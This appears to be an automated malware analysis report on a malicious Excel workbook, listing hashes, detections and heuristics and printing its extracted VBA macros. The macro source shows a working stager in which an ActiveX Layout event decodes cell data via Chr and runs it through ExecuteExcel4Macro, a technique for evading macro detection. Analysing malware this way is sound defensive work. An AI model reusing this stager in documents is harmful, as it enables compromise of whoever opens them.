Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 21861dfd5dc09356…

MALICIOUS

Office (OOXML)

Size: 37.3 KB | Created: 2020-07-07 07:10:18 UTC | Authoring application: Microsoft Excel 16.0300 | First seen: 2020-07-24
MD5: e3f0a053c8ca4394c5352d41627b0a67
SHA-1: 0ad720a9b870e87d5238c57f4bd1fb86dc4d3435
SHA-256: 21861dfd5dc09356971994ea642e9f3dc7afe1319b2d41ac19317c85ac5d5087
Risk Score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The file contains VBA macros that leverage an ActiveX event to trigger decoded Excel 4.0 macros. This mechanism is used to execute arbitrary code, as indicated by the critical heuristic firings and ClamAV detection. The script's logic suggests it attempts to deobfuscate and execute a payload, likely leading to further compromise.

Heuristics (3)

  • ClamAV: Xls.Malware.Mrhl-9774585-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Mrhl-9774585-0
  • VBA project inside OOXML [medium, 1 related finding] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA ActiveX event launches decoded Excel4 macro [critical] OLE_VBA_ACTIVEX_XLM_STAGER
    VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1090 bytes
SHA-256: e1825a887914c3237f9af1f08ed545a80e47a3edd794594de617e59ad644dbe3
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "fattura, 6, 0, MSForms, Frame"
Sub visualizza()
    Application.Dialogs(xlDialogPrint).Show: Application.WindowState = xlMinimized: ActiveWorkbook.Close 0
End Sub
Private Sub fattura_Layout()
    For Each cr In ActiveSheet.UsedRange.SpecialCells(xlCellTypeVisible)
        If cr.NumberFormat = 0 Then
            copia = Chr(cr.Column)
            If cr.Column <> 107 Then
                copia1 = copia1 + copia
            Else
                ExecuteExcel4Macro (copia1)
                copia1 = ""
            End If
        End If
    Next
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 10752 bytes
SHA-256: 8caffc9ee390c15a740aca2955397d7116ebb7314412793e68a90287ea65dd46
Detection
ClamAV: Xls.Malware.Mrhl-9774585-0
Obfuscation or payload: unlikely
emf_00.emf | ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2392 bytes
SHA-256: e541d72a55bf9f812d74dc173bef2d17937fdc9d850cbf999ccf24f5cb5a6933